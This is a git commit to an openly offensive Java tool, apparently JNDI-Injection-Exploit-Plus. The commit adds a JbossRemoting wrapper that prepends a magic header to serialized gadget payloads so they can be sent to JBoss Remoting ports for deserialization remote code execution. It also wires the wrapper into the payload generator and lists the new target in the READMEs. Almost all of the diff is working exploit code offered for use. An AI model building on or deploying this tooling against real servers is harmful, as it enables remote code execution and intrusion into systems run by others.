add JbossRemotingWrap

cckuailong · cckuailong · commit 68d4dee1b296 · 2023-03-03T17:02:50.000+08:00
diff --git a/README.md b/README.md
@@ -120,6 +120,7 @@ Wrapper | Example Vuls
 --------| -----------
 Xstream | CVE-2021-39149
 Apereo  | Apereo 4.1 Deserialization RCE
+JbossRemoting | Jboss Remoting Port Unserialization
 
 - Example
 
diff --git a/README_zh.md b/README_zh.md
@@ -107,6 +107,7 @@ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "<ip>:<port>" -D "
 --------| -----------
 Xstream | CVE-2021-39149
 Apereo  | Apereo 4.1 反序列化漏洞
+JbossRemoting | Jboss Remoting 服务反序列化
 
 - 示例
 
diff --git a/pom.xml b/pom.xml
@@ -6,7 +6,7 @@
 
     <groupId>cckuailong</groupId>
     <artifactId>JNDI-Injection-Exploit-Plus</artifactId>
-    <version>2.0-SNAPSHOT</version>
+    <version>2.1-SNAPSHOT</version>
 
     <properties>
         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
diff --git a/src/main/java/jndi/CommonDeserial.java b/src/main/java/jndi/CommonDeserial.java
@@ -23,6 +23,11 @@ public byte[] execByDeserialize(String gadgetType, String wrapperType) throws Ex
         if (wrapperType == null){
             Method method = payloadClass.getMethod("getBytes", String.class);
             bytes = (byte[])method.invoke(payloadClass.newInstance(), command);
+        }else if (wrapperType.equals("JbossRemoting")){
+            Method method = payloadClass.getMethod("getBytes", String.class);
+            bytes = (byte[])method.invoke(payloadClass.newInstance(), command);
+            JbossRemotingWrap wrap = new JbossRemotingWrap();
+            bytes = wrap.wrap(bytes);
         }else{
             Method method = payloadClass.getMethod("getObject", String.class);
             Object obj = method.invoke(payloadClass.newInstance(), command);
diff --git a/src/main/java/wrappers/BytesWrap.java b/src/main/java/wrappers/BytesWrap.java
@@ -0,0 +1,15 @@
+package wrappers;
+
+
+import org.reflections.Reflections;
+
+import java.lang.reflect.Modifier;
+import java.util.Iterator;
+import java.util.Set;
+
+
+@SuppressWarnings ( "rawtypes" )
+public interface BytesWrap<T> {
+
+    public T wrap(byte[] bytes) throws Exception;
+}
diff --git a/src/main/java/wrappers/JbossRemotingWrap.java b/src/main/java/wrappers/JbossRemotingWrap.java
@@ -0,0 +1,14 @@
+package wrappers;
+
+import java.io.IOException;
+
+public class JbossRemotingWrap implements BytesWrap<byte[]> {
+    public byte[] wrap(byte[] bytes) throws IOException {
+        byte[] MagicHead = {119,1,22,121};
+        byte[] res = new byte[MagicHead.length+bytes.length];
+        System.arraycopy(MagicHead, 0, res, 0, MagicHead.length);
+        System.arraycopy(bytes, MagicHead.length, res, MagicHead.length, bytes.length-MagicHead.length);
+
+        return res;
+    }
+}
